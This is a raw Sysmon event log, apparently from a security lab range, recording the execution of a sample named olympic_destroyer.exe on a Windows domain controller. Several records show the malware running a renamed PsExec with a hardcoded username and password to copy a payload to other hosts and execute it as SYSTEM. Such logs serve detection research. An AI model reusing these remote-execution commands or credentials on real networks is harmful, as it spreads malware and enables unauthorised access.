10:57:01.418{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-CC05-000000003802}7096C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.418{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-CC05-000000003802}7096C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.403{C8EA50B7-12FD-6216-CC05-000000003802}70966008C:\Windows\system32\conhost.exe{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.356{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-CC05-000000003802}7096C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.333{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FD-6216-CC05-000000003802}7096C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.318{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F81A95C929C26B91A600B1D98D19F871,SHA256=6265D02C281895CB8B89C195FA18DD3328910C8D64EFCAAF3B338D1A67876221,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:58.691{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51414-false10.0.1.12-8000- 10341000x8000000000000000291867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.271{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.271{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.271{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.271{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.203{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.187{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.194{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.187{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.187{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.171{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.171{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:01.102{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000217758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:02.916{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8358A15DB6569377DC62E19A34C60E12,SHA256=381C6E7F7268AB55D2C8BAA2424AFBD652F995C3CC397F9D3BF83060BE0EBA6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.748{C8EA50B7-12FE-6216-D805-000000003802}66726716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.632{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.632{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.638{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.632{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.616{C8EA50B7-12FE-6216-D905-000000003802}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.616{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-D905-000000003802}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.616{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-D905-000000003802}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:02.594{C8EA50B7-12FE-6216-D905-000000003802}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.563{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FE-6216-DA05-000000003802}6732C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.563{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FE-6216-DA05-000000003802}6732C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.547{C8EA50B7-12FE-6216-DA05-000000003802}67326520C:\Windows\system32\conhost.exe{C8EA50B7-12FE-6216-D905-000000003802}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.516{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.516{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.509{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12FE-6216-D805-000000003802}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.497{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-D805-000000003802}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.493{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program 